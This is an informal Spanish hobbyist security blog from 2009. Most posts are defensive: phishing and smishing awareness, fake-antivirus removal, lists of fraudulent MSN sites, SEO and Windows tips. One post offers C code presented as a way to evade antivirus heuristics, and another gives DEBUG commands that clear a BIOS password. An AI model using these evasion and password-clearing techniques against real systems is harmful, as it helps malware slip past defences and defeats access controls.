Unas pocas categorías tienen deshabilitado el enlace "Agregar URL" y no aceptan envíos ni listan sitios. Debería encontrar otra más específica explorando las subcategorías.

Url amigables

Esto va enfocado a sitios dinámicos

¿Que es un Web dinámica y una estática?
-Web estática
muestra el mismo contenido siempre, para agregar contenido se tiene que modificar la Web a veces por completo aunque con el CSS se pueden hacer grandes logros

-Web dinámica
son creadas según al que te visita en la mayoría de los casos se necesita base de datos recupera la información dependiendo ( en realidad las web no están hasta q alguien las visita ) la creación de paginas es mas fácil rápido tiene mas recursos que puedes lograr

¿Cual de las dos es mejor?
La estática según he leído se indexa mejor que la dinámica por que a google no le gustan los parámetros o 'sessID' o 'sessionID' ejemplo web.php?parametro5=7¶metro2
los ? = & no le gustan y no te indexara y si lo llegara a indexar no te posicionara por q al buscar
google se basa en url, titulo , contenido y link q apuntan hacia tu web (las metas actualmente no son necesarias pero no esta de mas ponerlas bien)

¿Dinamica es la mejor pero si no te indexa que se puede hacer ?
path info o mod_rewrite en realidad son parecidas pero el mod_rewrite es mas flexible
mod_rewrite
para su uso necesitas servidor Apache con el módulo mod_rewrite activado y permitido el uso de .htaccess
ejemplo tenemos
http://tuweb.com/tipo=buscadores&google=googlebot
seria
http://tuweb.com/buscadores/google/googlebot.html
en próximos se hará mas extenso este tema de mod_rewrite

Sitemaps
Un buen sitemaps es siempre muy bueno tenerlo ya que con esta herramienta google te indexa mas rápido tu contenido fresco
http://www.google.com/webmasters/sitemaps/?hl=es
Page rank y conseguir quien te enlace

Esta creado por los fundadores google es un valor numérico que va de 0 a 10
conforme mas pagerank mas difícil es subirlo
cuando alguien te linkea de la forma adecuada es como dar votos hacia tu Web.
pero es mejor que no te linke aquellas webs que están penalizadas por google (baneadas)
eso te perjudica también alguna q contenga demasiados enlaces hacia a otras webs
el pagerank lo puedes ver bajándote la barra google y en algunos sitios
y como deberían ser los links a continuación

Manejo correcto de los links
La mejor forma de poner los links es link de texto ejemplo
Código:
quiero a google

seguramente le has dado en cache a busqueda en google algunas veces solo aparece solo se encontraron términos q apuntan hacia esta pagina

Herramientas google

El mismo google te da herramientas para lograr una buena indexación

Asistente informativo sobre el estado del sitio
Descubra si su sitio forma parte ya del índice de Google.

Blog de Google destinado a webmasters (inglés)
Las últimas novedades y las noticias más recientes relacionadas con los sistemas de rastreo e indexación de sitios web utilizados por Google.

Herramientas para webmasters (incluido Sitemaps)
Estadísticas, diagnósticos y administración de los procesos de rastreo e indexación que realiza Google de su sitio web, incluidas funciones como el envío de Sitemaps y la generación de informes.

Foro de debate de Google para webmasters
Entable conversación con otros webmasters y comparta sus ideas con nosotros.

Envíe contenido a Google
Descubra los métodos para enviar contenido a distintos servicios de Google, como Google Base y Google Libros.

Centro de Asistencia para webmasters
Consulte las respuestas a las preguntas más frecuentes formuladas acerca del rastreo, la indexación, la clasificación y otros muchos temas.
todo ello aquí
http://www.google.com.mx/intl/es/webmasters/
mas capítulos posteriormente como robots.txt cuanto es lo máximo que debe pesar tu Web que no contenga errores como te puede penalizar y mas …

By XD (DJChileOut) Saludos!!!!! Flameb

Smishing ummmm a k sabe eso ajajaj xD

Es más un fraude de 'phishing' enviado a través de mensajes SMS.

Los delincuentes tecnológicos utilizan una nueva táctica enviando mensajes de texto en los que se simula provienen de empresas web conocidas.

"El 'phishing' tiene impacto los consumidores y tiene impacto sobre la seguridad general de Internet y esto daña a las empresas.

Cómo funciona

El sistema emisor de estos mensajes de texto o incluso un individuo el cual suele ser un spammer; intentará sumplantar la identidad de alguna persona conocida entre nuestros contactos o incluso una empresa de confianza.

Las víctimas de Smishing reciben mensajes SMS con líneas similares a estás: "Estamos confirmando que se ha dado de alta para un servicio de citas. Se le cobrará 2 dólares al día a menos que cancele su petición: www.?????.com."

Cuando visitamos la dirección web, las víctimas son incitados o incluso forzados a descargar algún programa que en su mayoría suele ser un Troyano.

Waaa

28.7.09

Comando importante Taskkill ummm si la verdad es excelente.

Quién ha escuchado taskkill? Aplicación de Windows usada para matar (cerrar) procesos y de esa forma librarse de aquellas aplicaciones que no se cierran por las buenas.
Comando importante cuando no responde y nos tiene jodidos putos del carajo.
Esto te podra servir arto:

taskkill.exe /f /fi "status eq not responding"

y ke es taskkill, bueno pos colocando taskkill /? en nuestra prompt (consola CMD , simbolo de sistema etc) lo podriamos ver.

y para saber como trabajan los PID ke ahi lo mencionan.
PID Identificacion de proceso, cada proceso de windows trabaja con un numero de ejecucion durante su proceso de ejecucion..

con solo colocar TASKLIST nos damos cuenta.
y para saber k mas hace es: TASKLIST /?

intenten

Saludos Flameb, un White mas...

Ya estamos artos de la HP gente k a diario tiene virus en el msn y no falta la persona k coma cuento y siga la infeccion en cadena


casualidades o mejor dicho cuidemosno.
Hay mucho lammer en la red k a diario tratan de mostrar su conocimiento por medio de un virusito en cadena. pronto pondre uno hecho por mi pa ke vamos analizando y miremos como actua.
Un saludo a killr00t k pronto tambien metera mano pa la revistica y a otras personas las cuales ire mencionando luego.
La idea de esto es k pongamos mas cuidado y ps el k necesita recomendacion pa evitar ps eso k nos hable por este medio k con gusto lo atendere.

Casualidades del destino:
El virus photo.zip aaaash es una mierda eso ke escriben mira mis nuevas fotos y k no se ke mierdas mas pudranse parecen verbo de atracador muy muy quemado.
Otros k son mostrando por enlace web. y luego al darle se te keda en tu makina.
Aunke hay unos un poco mas inteligentes k lo hacen por flood y por otro tipo de atakes, ya unos mas sabiesitos crean codigos k al pasarselos a la persona es como si ingresaran al msgplus y desde ahi crear un ciclo infinito k seria el k le da replicas hacia las otras personas

bueno ya existen muchas soluciones para evitar tanta cosa:

MSN Cleaner muy conocida en la red buena herramienta, ps colocar el nombre en google hay mismo te apareceria el enlace la idea de este post es poner esta.

Hoy veremos una llamada MSN Virus Cleaner, claro está que es simplemente la alternativa cuyo funcionamiento está basado en una base de datos de virus que fueron creados para Windows Live Messenger.

MSN Virus Cleaner es totalmente gratis, con un aspecto bastante moderno y compacto, de manera general se podría decir que detecta virus de utilidades de mensajería instantánea como Windows Live Messenger, Yahoo! Messenger, AOL Messenger y el ICQ Messenger.

El programa está en inglés, funciona en Windows Vista, 7, XP, 2000, 2003, entre otros. Un detalle de MSN Virus Cleaner es que, además de detectar virus y demás, permite hacer la mejor gestión de los programas que inician junto a Windows, así como también procesos del sistema, visualizar información del disco duro y administrar los servicios de Windows.

Claro está que MSN Virus Cleaner es la versión gratis, la versión completa (de pago) trae más utilidades. Pero bueno, para eliminar virus del Messenger, este programa está bien.

Enlace:
MSN virus cleaner

Eliminar falsos antivirus del sistema con Remove Fake Antivirus


Ummmm kizas pase mucho...
La verdad no instalemos por instalar y lo sgo diciendo nos volvimos pistoleros del doble clic la hp tecnologia nos esta pegando en la puta espalda y no nos deja seguir.

Bueno ahora viene una herramienta netamente importante ojala la usen ps no caigamos en webonadas en putos fakes y hoax k gente desparchada a diario esta subiendo en la red.

¿Falsos antivirus? Muchas veces hemos leído en blogs como el de SpamLoco que existen antivirus que no son tan auténticos como tal, sino que se tratan de programas espía que te engañan, promocionándote una solución en su “gran antivirus” a problemas de seguridad.

Entonces cuando procedemos a instalar estos antivirus falsos, nuestro sistema se llenará de cualquier basura informática. Pero tranquilo, que para combatir esas porquerías conocí Remove Fake Antivirus, cuyo objetivo es eliminar falsos antivirus instalados en tu sistema.

Pues bien, los falsos antivirus que soporta Remove Fake Antivirus son: Personal Antivirus, Anti-Virus-1, Spyware Guard 2008, Antivirus 360, SystemGuard2009, Antivirus 2009, System Security, Antivirus 2010, Antivirus Pro 2009, y MS Antispyware 2009. Son los más comunes.

Remove Fake Antivirus está en inglés, lamentablemente, pero funciona en Windows Vista, XP, 2003, 7, entre otros. Aunque carece de diferentes opciones para el usuario, lo que sí le aseguro a cualquier lector del blog es que es muy fácil de usar y a su vez bastante efectivo.

Enlace:
Remove Fake antivirus

Repara entradas inválidas o erróneas del registro de Windows




El registro de Windows es muy susceptible a cualquier tipo de alteración por el sistema en sí, por lo que mantenerlo limpio y en buen funcionamiento es un compromiso que se debe tomar con mucha seriedad pues de este aspecto depende el desempeño de nuestro PC.

En este sentido Cleanersoft Free Registry Fix te aporta una propuesta gratuita para que te puedas despreocupar por los problemas que le pueda traer el registro del sistema al buen desempeño de nuestro computador. Es un programa en inglés, su interfaz que es intuitiva.

Cleanersoft Free Registry Fix te permite escanear el registro del sistema y detectar cuáles son los errores que están presentes en dicho entorno del sistema, permitiéndote reparar y de esa manera obtener mejor desempeño del sistema. Es un proceso bastante sencillo.

Si quieres estar tranquilo, Cleanersoft Free Registry Fix te permite crear backup de todos los cambios que va realizando en el registro; obtén mayor estabilidad con este programa, también recomiendo que uses CCleaner para optimizar Windows y mejorar su velocidad

Enlace:
Registry FIXXXX

Cuidado ummm pasaba - paso -kizas vuelva pasar "Carding & phishing" siempre siempre 100preee

Cuidado Con el Carding - Phishing

Señores en este articulo solo les quiero comentar como son los ataques de carding mas comunes...

1. Que es carding?

Bueno el carding y el uso de Scams y Fakes de webs es algo muy popular ahora, miren les daré un ejemplo...

A ustedes les llega un mail de hotmail.support@microsoftmsn.com diciendoles que para agrandar su bandeja o alguna cosa algo asi entonces les dan como link:

http://login.live.co.cc/login.php?wa=wsignin1.0&rpsnv=10&ct=1244334402&rver=12 y les pide que inicie sesión nuevamente cuando ustedes pongan ahi su usuario y contraseña pues el carder tendrá sus datos de hotmail, ese fue solo un ejemplo de como funciona el carding yo puse un ejemplo con hotmail pero solo imaginense que pasaría si enves de hotmail fuese el banco en el que usted tiene varias cuentas.

2.- Como evito ser cardeado?

para empesar tienen que ver que de donde les llegue el mail sea verdaderamente microsoft por que la mayoria de veces usan correos que son un poco diferentes a los que realmente usa microsoft... mm a la hora de verificar las url si la web de su banco es www.banconacional.com verifique que no sea de una web como www.banconacional.co.cc o www.banconacional.tk es importante conocer bien las url de sus paginas para evitar ser victimas de este tipo de ataques.

3.- Como falcifican el mail?

Pues ellos usan mailers para enviar emails con programación la mayoria de veces con programas diseñados por ellos y las paginas se llaman scams las hacen con programación tambien.


Saludos
Dr.White

Saludos de mi parte al Sr White jejeje XD compadre de blog... Flameb Walaa hat jaja

22.7.09

Libro para hacer ejercicios


Bueno esta mierda no tiene k ver nada con lo ke me gusta ke es la seguridad, pero bueno, tambien tiene k ver con seguridad hagamos putos ejercicios y es por seguridad pa no sufrir de el corazon, dejemos la puta barriga al lado y hagamos algo interesante por nuestras putas vidas pa ver si nos ven bn en el infierno jajaja mentiras vale mierda pero bueno....
Hagamos ejercicios supuestamente este puto libro ayuda

Segun mierda de la ke hablan ke es hasta interesante y por eso lo publico es esto lean.

CAPÍTULO 1: Introducción..........................................................................................5
CAPÍTULO 2: Claves para fuerza y tamaño.............................................................17
CAPÍTULO 3: Evaluación de las necesidades ...........................................................27
CAPÍTULO 4: Métodos de entrenamiento.................................................................45
CAPÍTULO 5: Planificando el volumen.....................................................................61
CAPÍTULO 6: Variables de entrenamiento críticas .................................................65
CAPÍTULO 7: Bloques de entrenamiento..................................................................81
CAPÍTULO 8: Planificando la intensidad..................................................................89
CAPÍTULO 9: Frecuencia de entrenamiento ............................................................93
CAPÍTULO 10: Consejos de culturismo ..................................................................113
CAPÍTULO 11: Ejemplos de programas de culturismo.........................................119
CAPÍTULO 12: Ej. de un programa de 12-semanas de fútbol americano............139
CAPÍTULO 13: Aprendiendo los levantamientos Olímpicos.................................167
CAPÍTULO 14: Temáticas breves ............................................................................237
CAPÍTULO 15: Más ejemplos de programas..........................................................251


Haca el enlace de el PDF

DESCARGAAA Y REBAJA PUTO

Redes inalambricas tuto tuto bueno es un buen manual


Hola ojala lo lean es un buen tuto y ps se aprende arto sistemas MAC y Windows

Ya dejemos a un lado tanto hp modem y tiremosle a algo diferente jajaja, SAludos a los amigos soporte Edatel gran saludo y los ke han salido, dedicado ahi ps pa ke aprendan muchachos es una buena opcion.. Y a el johan Kaxiux jeje XD

enlace:
REDES INALAMBRICAS

19.7.09

Quien te Admite ???? duda duda duda jaja TE ENGAÑAN JAAJ

A continuación se detalla una lista de servicios que NO sirven para saber quien te bloquea en los mensajeros electrónicos. Además, se deja explicación de cada uno de ellos, a través de sitios que han investigado cada caso en particular.

Si bien muchos de estos sitios dicen no almacenar direcciones de correo y datos personales esto no puede probarse y siempre es recomendable no utilizar estos servicios debido al caracter poco confiable de los mismos.

Se debe recordar que estos sitios generalmente son un engaño para obtener direcciones de correo y datos personales (como mínimo) utilizando la Ingeniería Social.
¿Puedo saber quién me bloquea/admite?. NO.
¿Puedo saber quién me eliminó?. SI.

NOTA: los sitios que figuran a continuación a sido obtenidos a través de informes de usuarios y no significa que se haya probado que almacenan información sensible del usuario pero se insiste en no utilizarlos debido al caracter intrusivo de las metodologías utilizadas.
Los sitios web que aparecen en este listado no necesariamente guardan los datos privados de los usuarios pero podrían hacerlo.

NOTA: Si Ud. ingresó a algunos de estos sitios es recomendable cambiar su contraseña.

Sitios fraudulentos en español:

adictosalmsn
admitimequerida
admitemeya
admitemimsn
admitidomsn
admitomsn
alguiennoteadmite, también contiene malware
atevip
blockeado
blockeo, avisa en su Disclamer que sólo informa sobre contactos eliminados y recomienda cambiar la contraseña
blockyell
blockoo, bloquo o blocuo que aclara que detecta quien te ha eliminado.
bloqueados
borradito
borrado
caleta y caletanomas, sitio peruano que abre ventanas con publicidad
checkapic
checkmessenger y checkmessenger2, aquí y aquí
cristianos/quien-teadmite
cuentasborradas
deletefinder
detectmsn
desadmite / amor.desadmite
descubremsn
detectando
e-inicio / quienesmalo
eliminado (de España)
eliminadomsn, hace la aclaración de que sólo detecta los eliminados
eliminalos
eramsn
espiacorreos, actualmente dado de baja pero en 2005 fue el origen de otros sitios citados aquí (aún disponible en la Cache de Google y en Archive).
estasnoadmitido
falsos
gabons
genialmsn
granpecado
historialesdeamigos
historialesdemsn3
listamsn
lohizo
medesadmite quien ya es considerado peligroso por SiteAdvisor y que informa de inactividad en la cuenta mientras el sistema chequea los contactos
messenger-tips, avisa en su Disclamer que sólo informa sobre contactos eliminados y recomienda cambiar la contraseña
messentools / msn-check-list
msndetect.estupideces
messengerdetector
msnadmitido
msneliminado
msnsinadmision
muymsn
noadmitido, fue uno de los primeros en 2006. Ha sido dado de baja pero su aún puede encontrarse Archive
noadmitidomsn
perujovenes
queblock , que se está volviendo muy popular
queescandalo
quienadmitemessenger
quienesmalo / e-inicio
quienignora
quienmeadmite
quiennoadmitido
quiennomeadmite
quienteadmite, actualmente es el más famoso y por eso puede encontrarse mucha información aquí o aquí o aquí o aquí o aquí y por supuesto ellos se defienden con insultos infundados. Es considerado peligroso por SiteAdvisor y existe un video en donde no muestra los contactos bloqueados.
quien-te-ama
quientebloquea
radiusim
revisatumsn, avisa que sólo informa sobre contactos eliminados
sacados.tonazo
scanmessenger
secretosdelmsn, actualmente dado de baja pero que aún puede verse en Archive
tebloqueo, que abre ventanas con publicidad
teborraron
traidordelmsn
tumsn y tumsnlive
undisplay / quientebloqueo
vercontactos
youareblocked
Sitios fraudulentos en inglés
blockdelete
blockstatus
bugmenot
msnblockchecker
msnblockerlist
msnblocklist
msnliststatus
msnstatus
you-areblocked

¿Cómo funcionan estos sitios?
Estos "sistemas de información" utilizan una clase PHP gratuita (disponible en muchos sitios), que se basa en el API del MSN de Microsoft, que es pública y no se basa en ningún bug conocido ni desconocido.


Esta clase comprueba que contactos te han eliminado de su lista (que no es lo mismo que los que te tienen sin admisión o bloqueado) y los muestra en pantalla. Esta clase pública no almacena ningún dato privado, lo que no significa que quienes la utilicen no almacenen los mismos a través de otros medios.

Gracias a los SEGU-INFO

Eliminando Sysantivirus 2009 Peligrosito jeje XD

Bueno primero explicando algo:
El sysnativirus 2009 pasa mucho aki en colombia muchas personas creyendo ke es la solucion a sus problemas creen ke con el sysantivirus 2009 porke hasta bonito suena seria la solucion a sus problemas, antes este si es un problema por eso no seamos PISTOLEROS DEL DOBLE CLICK JAJAJA SOCIEDAD ANALFABETA NO MAS !!!!!

Para eliminar SysAntivirus 2009 se puede hacer de forma automática ó manual, para hacerlo de forma automática tenemos que bajar la herramienta SysAntivirus 2009 Removal Tool que eliminará y desinfectará nuestro sistema de este falso antivirus.

Para eliminar SysAntivirus 2009 de forma manual, lo primero que tenemos que hacer es eliminar los siguientes ficheros:

SysAntivirus2009.exe
SysAntivirus 2009.lnk
Uninstall SysAntivirus 2009.lnk
Register SysAntivirus 2009.lnk


Y después eliminar las siguientes entradas del registro:

HKEY_CURRENT_USER\Software\SysAntivirus2009
HKEY_LOCAL_MACHINE\SOFTWARE\SysAntivirus2009
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
“Antivirus” = “%ProgramFiles%\SysAntivirus2009\SysAntivirus2009”
Debido a que eliminar SysAntivirus 2009 de forma manual es un procedimiento un poco complejo, os recomendamos que primero eliminéis el falso antivirus usando el programa, SysAntivirus 2009 Removal Tool,y luego comprobéis que los ficheros que os hemos comentado no estén en vuestro sistema.

ya k si no keres de esa manera de forma manual y no keres aprender hacerlo porke crees ke te ocupa tiempo o sos un puto facilista de mierda has esto descarga el parchesito ke dan en este enlace...

Es el removal tool

REmoval tools Sys-antivirus2009

X-k, Son importantes los Anti virusses je XD?

Para está semana vamos a continuar con está serie de consejos que ha publicado US-CERT, si la semana pasada vimos "Buenos hábitos cuando elijamos una contraseña", está semana hablaremos de los antivirus e intentaremos explicar su funcionamiento.

Aunque los detalles pueden variar entre los distintos antivirus del mercado, la mayoría de los antivirus escanean los archivos o la memoria del equipo siguiendo ciertos patrones que pueden indicar una infección. Dichos patrones se suelen buscar en una base de firmas o definiciones de virus conocidos.


Los autores de virus están continuamente liberando virus nuevos, así como actualizándolos versiones anteriores que los antivirus protegían, por lo que es importante tener actualizado el antivirus con las últimas definiciones de virus.

Una vez tengas instalado un antivirus en tu ordenador es recomendable todo el equipo periódicamente, que puede realizarse de varias formas:

Escanear automáticamente el sistema -> Según el antivirus que elijas puede ser posible que permita configurarlo para que automáticamente escanee determinados archivos o directorios, así como indicarle el intervalo en el que quieres que se realice los escaneos.
Escanear de forma manual el sistema -> También es una buena idea escanear manualmente los archivos que recibes de una fuente externa antes de abrirlos, lo que incluye:
La exploración de archivos adjuntos en correo electrónico o descargados de una web.
La exploración de medios, donde se incluyen los CD y DVD, en busca de virus antes de abrir cualquiera de los archivos que contengan.
Cada antivirus tiene su propio método de actuar cuando se localiza un virus, y puede variar en función de si el antivirus detecta el virus durante un escaneo automático o una búsqueda manual. Y a veces el software producirá un cuadro de diálogo de alerta donde se te preguntará si quieres "limpiar" el archivo, por lo que cuando instales un antivirus debes familiarizarte con las características de dicho antivirus.

En el mercado existen muchos antivirus, y la decisión de elegir uno puede ser confusa, ya que casi todos los antivirus realizan la misma función, pero no todos tienen las mismas bases de firmas, por lo que puede ser un buen punto a tener en cuenta, así como la disponibilidad o el precio.

La instalación de cualquier antivirus, independientemente del que elijas aumenta tu nivel de protección, pero ten cuidado con los mensajes de correo electrónico sobre antivirus gratuitos o diciéndote que tu ordenador está infecto. Estos mensajes contienen un archivo adjunto que afirma ser un antivirus, pero sin embargo, en realidad es un virus que infectará tu sistema al abrirlo.

Recuerda que un antivirus tiene sus limitaciones, porque se basan en realizar búsquedas sobre una base de firmas, y sólo puede detectar los virus según las firmas que tenemos instaladas en el equipo, por lo que es muy importante mantener estas firmas actualizadas.

Visto en Cyber Security Tip ST04-005.

11.7.09

Delincuentes pagan más de 30 mil dólares por un viejo modelo de celular




descubrieron que su software puede utilizarse para realizar fraudes bancarios interceptando comunicaciones.
El viejo modelo de teléfono celular Nokia 1100 pasó a ser un artefacto altamente valuado por delincuentes en los últimos tiempos, al punto que ofrecen más de 30 mil dólares por él. Si bien este móvil se lanzó en 2003 y su precio no superaba los 130 dólares, los hackers comenzaron a valorarlo al descubrir que su software permite interceptar comunicaciones, y de este modo realizar fraudes bancarios.
La firma de seguridad holandesa Ultrascan Advanced Global Investigations detectó esta situación en foros frecuentados por hackers, donde ofrecían sumas altísimas por el Nokia 1100. El interés estaba puesto especialmente en los modelos fabricados en la ciudad alemana de Bochum, dado que el software de éstos puede usarse para interceptar las claves que se envían a los clientes desde los bancos.

Los Nokia 1100 se pueden programar para que reemplacen el número de otra persona, y así los delincuentes pueden recibir la contraseña desde el banco, e ingresar a la cuenta de una persona. Según la firma, este tipo de fraudes se realizan en países como Alemania y Holanda.

WALAAAAAAAAA BUENO MI 1100 JAJAJA TE LO VENDO PUTO EXTRANJERO JAJA

delincuentes-pagan-mas-de-30-mil-dolares-por-un-viejo-modelo-de-celular.html

VB6 - Portable Walaaaaaaaaaaaa




Visual Basic es un lenguaje de programación desarrollado por Alan Cooper para Microsoft. El lenguaje de programación es un dialecto de BASIC, con importantes añadidos. Su primera versión fue presentada en 1991 con la intención de simplificar la programación utilizando un ambiente de desarrollo completamente gráfico que facilitara la creación de interfaces gráficas y en cierta medida también la programación misma. Desde el 2001 Microsoft ha propuesto abandonar el desarrollo basado en la API Win32 y pasar a trabajar sobre un framework o marco común de librerías independiente de la version del sistema operativo, .NET Framework, a través de Visual Basic .NET (y otros lenguajes como C Sharp (C#) de fácil transición de código entre ellos) que presenta serias incompatibilidades con el código Visual Basic existente.

Visual Basic constituye un IDE (entorno de desarrollo integrado o en inglés Integrated Development Enviroment) que ha sido empaquetado como un programa de aplicación, es decir, consiste en un editor de código (programa donde se escribe el código fuente), un depurador (programa que corrige errores en el código fuente para que pueda ser bien compilado), un compilador (programa que traduce el código fuente a lenguaje de máquina), y un constructor de interfaz gráfica o GUI (es una forma de programar en la que no es necesario escribir el código para la parte gráfica del programa, sino que se puede hacer

http://rapidshare.com/files/251010951/Vb6_portable.zip

“Regalar un portátil con Windows es malévolo”, dice Stallman

El programador Richard Stallman, figura destacada del software libre y que ya pidiera a Zapatero que no “vendiera el país a Microsoft”, vuelve a la carga con los controvertidos portátiles para el sistema educativo de la iniciativa Escuela 2 que tiene previsto entregar el gobierno español.

El fundador de la organización sin ánimo de lucro Free Software Foundation y creador del concepto copyleft, está en España para inaugurar el Desktop Summit 2009 que se celebra en Gran Canaria.

En su línea habitual de “purismo radical” en lo concerniente al software libre defendió la “libertad al usar los ordenadores”, indicando que el ordenador del plan español “es malévolo” si incluye un sistema propietario como Windows.

“Si un ordenador necesita un sistema operativo -como Windows, Linux o MacOS- para poder ser controlado, y tú no tienes el control sobre el sistema operativo entonces no estás controlando el ordenador”, advirtió Stallman, que de paso no se olvidó de la organización más odiada del país cuando en un perfecto español gritó un “Abajo la SGAE”, entre los aplausos de los asistentes.


FUENTE : http://www.theinquirer.es/2009/07/06/regalar-un-portatil-con-windows-es-malevolo-dice-stallman.html

9.5.09

como recuperar el flash en el navegador...!!!

verificar por la ruta en ejecutar

%systemroot%\system32\Macromed\Flash

Verificar que si este el archivo de extension *.OCX
si no esta?

1. Instalar adobe flash player para el navegador ke se tenga
2. Instalar shockwave flash player

Si esta y no funciona???

1. registrar la entrada desde el ejecutar:
regsvr32 C:\windows\system32\Macromed\Flash\(depende de la version ke se tenga).ocx

EJEMPLO:
regsvr32 C:\windows\system32\Macromed\Flash\Flash10b.ocx

Si no funca avisenme y lo solucionamos....!!!

8.5.09

Avira CD RESCUE.... Bueno Servira mucho

quizas ya la conocen POR LA SOMBRILLITA JAJAJAJAJA, sino pues consegui esta herramienta que me ha sido muy util se trata de Avira AntiVir Rescue System, basicamente se trata de un cd de inicio en LINUX, con el cual pueden iniciar sistema y correr el antivirus, o sea iniciar en un sistema limpio y ejecutar un scan al disco duro, por supuesto tambien permite rescatar nuestra información. es de uso libre constantemente se esta actualizando asi que abra que bajarlo cada cierto tiempo.
/////////////////////////////////////////////English
-------------------------------------------------------------------------!!!!
Avira AntiVir Rescue System is a Linux-based application that allows accessing computers that cannot be booted anymore. Thus it is possible to:
repair a damaged system,
rescue data,
scan the system for virus infections.
Just double-click on the rescue system package to burn it to a CD/DVD. You can then use this CD/DVD to boot your computer.

The Avira AntiVir Rescue System is updated several times a day so that the most recent security updates are always available.....

LINK...............

http://www.free-av.com/en/products/12/avira_antivir_rescue_system.html

Pronto !!!!!!!

BUENO ALGO PS AHI COMO PA IRNOS AFIANZANDO SOBRE LO KE HOY POR HOY SERA EL BLOG Y PRONTO TAMBIEN LA WEB BINARIA JEJE DEL FLAMEB....

SE VIENE:

1. E-Zine (la primera, sera un gran inicio)
2. Windows Desatendido (con muchos errores corregidos por yo jeje)
3. Software.... ETTTTCCCCCCCCCCCCCC

2.5.09

Codigo para saltar heuristicas

Holas aki les paso el code para saltar heuristicas creo ke al ver
la programacion ke se usa sabemos de ke es C, y ps ya el otro codigo
kedaria a imaginacion de uds
Hasta el dia de hoy funciona...

#include < windows.h >
#include < stdio.h >
// SHGetSpecialFolderPath
typedef BOOL (WINAPI *MY_SHGETSPECIALFOLDERPATH)(HWND ,LPTSTR ,int ,BOOL );
void main(void)
{
HINSTANCE hinstLib;
char PathWinProc[256];
MY_SHGETSPECIALFOLDERPATH my_SHGetSpecialFolderPath;
// LPSTR fun;
// FARPROC ProcAdd;
printf ("Dinamic Load SHGetSpecialFolderPath()\r\n");
//SHGetSpecialFolderPath

// fun = (LPSTR)"SHGetSpecialFolderPathA";
hinstLib = LoadLibrary("shell32.dll");
if ( hinstLib != NULL)
{
my_SHGetSpecialFolderPath = (MY_SHGETSPECIALFOLDERPATH) GetProcAddress(hinstLib,"SHGetSpecialFolderPathA");
if ( my_SHGetSpecialFolderPath != NULL)
{

memset(PathWinProc,0,sizeof(PathWinProc));
my_SHGetSpecialFolderPath(NULL,PathWinProc,38,FALSE);
printf ("PathWinProc: %s\r\n",PathWinProc);
}else printf (" Error GetProcAddress()\r\n");
}
}

1.5.09

Tutorial como resetear el BIOS sin abrir la PC

Para Resetear la bios de nuestro ordenador por software utilizaremos el "Debug" de windows en cualquiera de sus versiones. Pues bien pulsamos el boton de "inicio" y seleccionamos "Ejecutar" en la ventanita que aparece escribimos "Debug" ( sin las comillas ) y se habrira una pantalla de DOS escribiremos los siguientes comandos: (sin las Comillas)
"o 70, 2e" (enter cada vez)!!!
"o 71, ff"
"o 70, 2f"
"o 71, ff"
despues cerramos la ventana y nuestra bios ya esta reseteada, esto significa que si tenia alguna contraseña esta tambien a quedado resetea.
Ojo!!! para los novatos. Si lo hacen en sus maquinas perderan TODA la configuracion del setup

NOTA: no hay peligro alguno de que se corrompa el BIOS haciendo este procedimiento. Tampoco aseguramos que funcione en todas las PC’s